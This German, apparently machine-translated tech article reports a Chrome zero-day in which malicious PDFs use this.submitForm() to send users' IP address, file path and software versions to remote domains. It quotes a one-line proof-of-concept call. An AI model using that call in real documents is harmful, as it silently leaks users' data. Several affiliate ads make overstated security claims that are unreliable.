Mit dem Chrome-Bug können Hacker Benutzerdaten über PDF-Dateien sammeln

  • Robert Dean
  • 0
  • 4564
  • 252

Der Exploit-Erkennungsdienst EdgeSpot hat eine faszinierende Zero-Day-Sicherheitsanfälligkeit in Chrome entdeckt, bei der PDF-Dokumente ausgenutzt werden.

Die Sicherheitsanfälligkeit ermöglicht es Angreifern, vertrauliche Daten mithilfe von in Chrome geöffneten schädlichen PDF-Dokumenten zu sammeln. 

Sobald das Opfer die entsprechenden PDF-Dateien in Google Chrome öffnet, arbeitet ein Schadprogramm im Hintergrund, indem Benutzerdaten erfasst werden.

Die Daten werden dann an den Remote-Server weitergeleitet, der von den Hackern kontrolliert wird. Sie fragen sich möglicherweise, welche Daten von den Angreifern gesaugt werden. Sie zielen auf die folgenden Daten auf Ihrem PC ab:

  • IP Adresse
  • Vollständiger Pfad der PDF-Datei auf dem System
  • Betriebssystem- und Chrome-Versionen

Hüten Sie sich vor von Malware durchsetzten PDF-Dateien

Experten entdeckten diese eine der beiden Domänen readnotify [.] com oder burpcollaborator [.] net erhielt die Daten.

Sie enthüllten, dass die Angreifer die verwenden this.submitForm () PDF Javascript API zum Sammeln der vertraulichen Informationen der Benutzer.

Wir haben es mit einem minimalen PoC getestet, einem einfachen API-Aufruf wie this.submitForm ('http://google.com/test') veranlasst Google Chrome, die persönlichen Daten an google.com zu senden.

Dieser Chrome-Fehler wurde von zwei unterschiedlichen Gruppen schädlicher PDF-Dateien ausgenutzt, die beide im Oktober 2017 bzw. September 2018 verbreitet wurden.

Insbesondere können die gesammelten Daten von den Angreifern verwendet werden, um Angriffe in Zukunft zu optimieren. Berichten zufolge wurde der erste Stapel von Dateien mit dem PDF-Tracking-Service von ReadNotify kompiliert.

Benutzer können den Dienst verwenden, um die Benutzeransichten zu verfolgen. EdgeSpot hat keine Details bezüglich der Art des zweiten Satzes von PDF-Dateien mitgeteilt.

Kurztipp: Ändern Sie Ihren Browser in Opera

In diesen schwierigen Zeiten werden wir bei jedem Schritt mit Malware, Phishing und Trojanern angegriffen, daher müssen wir viel wachsamer sein und geschützt bleiben.

Und da dies ein spezifisches Problem für Chrome ist, können Sie diese und alle anderen Bedrohungen mit einem sicherheitsorientierten Browser wie Opera vermeiden.

Dieser Browser verfügt über einen integrierten Werbeblocker, der nicht nur solche Ablenkungen beseitigt, sondern auch Analyseskripte, Pixelverfolgung und Methoden zum Sammeln Ihrer Daten blockiert. 

Und wenn Sie absolut sicher sein möchten, dass Sie sich von Gefahren fernhalten, setzen Sie sich für den integrierten VPN-Dienst ein, der zu 100% kostenlos und unbegrenzt genutzt werden kann.

Oper

Opera bietet den perfekten Schutz vor Bedrohungen mit dem integrierten Werbeblocker und dem kostenlosen VPN-Dienst! Kostenlos bekommen Besuche die Website

Wie kann ich vor PDF-Schwachstellen geschützt bleiben??

Laden Sie Adobe Acrobat PRO herunter

Adobe und Chrome passen gut zum Umgang mit PDF-Dateien. Durch die Installation der Adobe-Erweiterung für Chrome können Sie PDF-Dateien nach Ihren Wünschen überprüfen und bearbeiten, ohne Ihren bevorzugten Browser verlassen zu müssen.

Trotz seiner robusten Struktur wird in PDF-Dateien versteckte Malware möglicherweise nicht erkannt, wenn Sie die Standardversion des Readers verwenden.

Die professionelle Version wird empfohlen, um Ihren Schutz zu gewährleisten und Ihre Daten von Hackern fernzuhalten.

Obwohl es nicht kostenlos ist, ist der Preis, den Sie zahlen, für die Vielzahl zusätzlicher Funktionen, die Sie genießen werden, einschließlich der verbesserten Sicherheit Ihrer PDF-Dateien, eher gering.

Es ist auch eine kostenlose 7-Tage-Testversion enthalten, damit Sie vor dem Kauf einen Eindruck von der vollständigen Pro-Erfahrung erhalten.

Adobe Acrobat PRO

Halten Sie sich von Malware fern, indem Sie Adobe Acrobat PRO herunterladen. Es bietet viel mehr Funktionen als die kostenlose Version und schützt Ihre Daten. Kostenlose Testphase Website besuchen Lesen Sie mehr

Wenn Sie beim Surfen im Internet sicher sein möchten, benötigen Sie ein spezielles Tool zum Sichern Ihres Netzwerks.  Installieren Sie jetzt Private Internet Access und sichern Sie sich. Es schützt Ihren PC vor Angriffen beim Surfen, maskiert Ihre IP-Adresse und blockiert jeden unerwünschten Zugriff.


Der Exploit-Erkennungsdienst EdgeSpot wollte die Chrome-Nutzer auf mögliche Risiken aufmerksam machen, da nicht erwartet wurde, dass der Patch in naher Zukunft veröffentlicht wird.

EdgeSpot berichtete Google über die Sicherheitsanfälligkeit im letzten Jahr und das Unternehmen versprach, Ende April einen Patch zu veröffentlichen.

Sie können jedoch eine vorübergehende Problemumgehung in Betracht ziehen, indem Sie die empfangenen PDF-Dokumente lokal mit einer anderen Reader-App anzeigen.

Alternativ können Sie Ihre PDF-Dokumente auch in Chrome öffnen, indem Sie Ihre Systeme vom Internet trennen.

FAQ: Erfahren Sie mehr über Chrome-Erweiterungen

  • Funktioniert Privacy Badger mit Chrome??

Ja tut es. Wenn Sie jedoch eine größere Auswahl wünschen, lesen Sie in diesem vollständigen Handbuch unsere Top-Angebote für Chrome-Datenschutzerweiterungen.

  • Können Sie PDFs in Chrome bearbeiten??

Es gibt viele Erweiterungen, die die Verarbeitung von PDFs ermöglichen. Lesen Sie unseren hervorragenden Leitfaden zu den besten PDF-Erweiterungen für Chrome.

  • Hat Google einen QR-Code-Generator??

Es funktioniert nicht, aber Sie können es schnell aktivieren. Hier ist unsere umfassende Anleitung zum Aktivieren des QR-Code-Generators in Chrome.

Anmerkung des Herausgebers: Dieser Beitrag wurde ursprünglich im April 2020 veröffentlicht und seitdem im August 2020 überarbeitet und aktualisiert, um Frische, Genauigkeit und Vollständigkeit zu gewährleisten.

  • Internet-Sicherheit
  • PDF



Bisher hat noch niemand einen Kommentar zu diesem Artikel abgegeben.

Die interessantesten und nützlichsten Artikel aus der Welt der Informationstechnologie
Praktische Tipps, neueste Artikel und aktuelle Nachrichten zur Verbesserung Ihres technischen Lebens. Fühlen Sie sich wie in der Welt der modernen Technologie